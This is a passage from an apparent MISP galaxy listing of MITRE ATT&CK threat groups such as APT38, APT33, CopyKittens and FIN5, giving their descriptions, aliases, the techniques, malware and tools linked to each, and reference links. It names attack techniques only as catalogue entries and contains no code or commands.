uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="OSInfo - S0165" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="SHOTPUT - S0063" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Cracking - T1110.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="LaZagne - S0349" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"

Table 4530. Table References
Links
https://attack.mitre.org/groups/G0022
https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html
https://www.recordedfuture.com/chinese-mss-behind-apt3/
https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html
http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong
https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf
http://pwc.blogs.com/cyber_security_updates/2015/07/pirpi-scanbox.html

APT38 - G0082

[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017)

The tag is: misp-galaxy:mitre-intrusion-set="APT38 - G0082"

APT38 - G0082 is also known as:

APT38
NICKEL GLADSTONE
BeagleBoyz
Bluenoroff
Stardust Chollima

View relationships graph

APT38 - G0082 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="DarkComet - S0334" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1565.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1565.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="HOPLIGHT - S0376" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="ECCENTRICBANDWAGON - S0593" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Bookmark Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Impair Command History Logging - T1562.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="KillDisk - S0607" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4531. Table References
Links
https://attack.mitre.org/groups/G0082
https://us-cert.cisa.gov/ncas/alerts/aa20-239a
https://content.fireeye.com/apt/rpt-apt38
https://www.justice.gov/opa/pr/three-north-korean-military-hackers-indicted-wide-ranging-scheme-commit-cyberattacks-and
https://securelist.com/lazarus-under-the-hood/77908/
https://www.secureworks.com/research/threat-profiles/nickel-gladstone
https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-april-stardust-chollima/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

TA459 - G0062

[TA459](https://attack.mitre.org/groups/G0062) is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. (Citation: Proofpoint TA459 April 2017)

The tag is: misp-galaxy:mitre-intrusion-set="TA459 - G0062"

TA459 - G0062 is also known as:

TA459

View relationships graph

TA459 - G0062 has relationships with:

similar: misp-galaxy:threat-actor="TA459" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-malware="ZeroT - S0230" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="NetTraveler - S0033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="gh0st RAT - S0032" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"

Table 4532. Table References
Links
https://attack.mitre.org/groups/G0062
https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts

MONSOON - G0042

The tag is: misp-galaxy:mitre-intrusion-set="MONSOON - G0042"

View relationships graph

MONSOON - G0042 has relationships with:

similar: misp-galaxy:threat-actor="Dropping Elephant" with estimative-language:likelihood-probability="likely"
revoked-by: misp-galaxy:mitre-intrusion-set="Patchwork - G0040" with estimative-language:likelihood-probability="almost-certain"

Table 4533. Table References
Links
https://attack.mitre.org/groups/G0042

CopyKittens - G0052

[CopyKittens](https://attack.mitre.org/groups/G0052) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip. (Citation: ClearSky CopyKittens March 2017) (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015)

The tag is: misp-galaxy:mitre-intrusion-set="CopyKittens - G0052"

CopyKittens - G0052 is also known as:

CopyKittens

View relationships graph

CopyKittens - G0052 has relationships with:

similar: misp-galaxy:threat-actor="CopyKittens" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="TDTESS - S0164" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="Matryoshka - S0167" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4534. Table References
Links
https://attack.mitre.org/groups/G0052
http://www.clearskysec.com/copykitten-jpost/
http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf
https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf

Honeybee - G0072

[Honeybee](https://attack.mitre.org/groups/G0072) is a campaign led by an unknown actor that targets humanitarian aid organizations and has been active in Vietnam, Singapore, Argentina, Japan, Indonesia, and Canada. It has been an active operation since August of 2017 and as recently as February 2018. (Citation: McAfee Honeybee)

The tag is: misp-galaxy:mitre-intrusion-set="Honeybee - G0072"

Honeybee - G0072 is also known as:

Honeybee

View relationships graph

Honeybee - G0072 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1546.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="cmd - S0106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Reg - S0075" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Systeminfo - S0096" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Tasklist - S0057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 4535. Table References
Links
https://attack.mitre.org/groups/G0072
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/

APT33 - G0064

[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)

The tag is: misp-galaxy:mitre-intrusion-set="APT33 - G0064"

APT33 - G0064 is also known as:

APT33
HOLMIUM
Elfin

View relationships graph

APT33 - G0064 has relationships with:

similar: misp-galaxy:threat-actor="APT33" with estimative-language:likelihood-probability="likely"
similar: misp-galaxy:threat-actor="MAGNALLIUM" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="NETWIRE - S0198" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="TURNEDUP - S0199" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="NanoCore - S0336" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Ruler - S0358" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Pupy - S0192" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="AutoIt backdoor - S0129" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="FTP - S0095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="LaZagne - S0349" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PowerSploit - S0194" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="POWERTON - S0371" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PoshC2 - S0378" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="StoneDrill - S0380" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 4536. Table References
Links
https://attack.mitre.org/groups/G0064
https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html
https://www.brighttalk.com/webcast/10703/275683
https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/
https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage

APT34 - G0057

APT34 is an Iranian cyber espionage group that has been active since at least 2014. The group has targeted a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. APT34 loosely aligns with public reporting related to OilRig, but may not wholly align due to companies tracking threat groups in different ways. (Citation: FireEye APT34 Dec 2017)

The tag is: misp-galaxy:mitre-intrusion-set="APT34 - G0057"

View relationships graph

APT34 - G0057 has relationships with:

revoked-by: misp-galaxy:mitre-intrusion-set="OilRig - G0049" with estimative-language:likelihood-probability="almost-certain"

Table 4537. Table References
Links
https://attack.mitre.org/groups/G0057

Group5 - G0043

[Group5](https://attack.mitre.org/groups/G0043) is a threat group with a suspected Iranian nexus, though this attribution is not definite. The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes, normally using Syrian and Iranian themes. [Group5](https://attack.mitre.org/groups/G0043) has used two commonly available remote access tools (RATs), [njRAT](https://attack.mitre.org/software/S0385) and [NanoCore](https://attack.mitre.org/software/S0336), as well as an Android RAT, DroidJack. (Citation: Citizen Lab Group5)

The tag is: misp-galaxy:mitre-intrusion-set="Group5 - G0043"

Group5 - G0043 is also known as:

Group5

View relationships graph

Group5 - G0043 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="njRAT - S0385" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="NanoCore - S0336" with estimative-language:likelihood-probability="almost-certain"

Table 4538. Table References
Links
https://attack.mitre.org/groups/G0043
https://citizenlab.ca/2016/08/group5-syria/

FIN5 - G0053

[FIN5](https://attack.mitre.org/groups/G0053) is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian. (Citation: FireEye Respond Webinar July 2017) (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)

The tag is: misp-galaxy:mitre-intrusion-set="FIN5 - G0053"

FIN5 - G0053 is also known as:

FIN5

View relationships graph

FIN5 - G0053 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="pwdump - S0006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-malware="RawPOS - S0169" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="Windows Credential Editor - S0005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-tool="SDelete - S0195" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
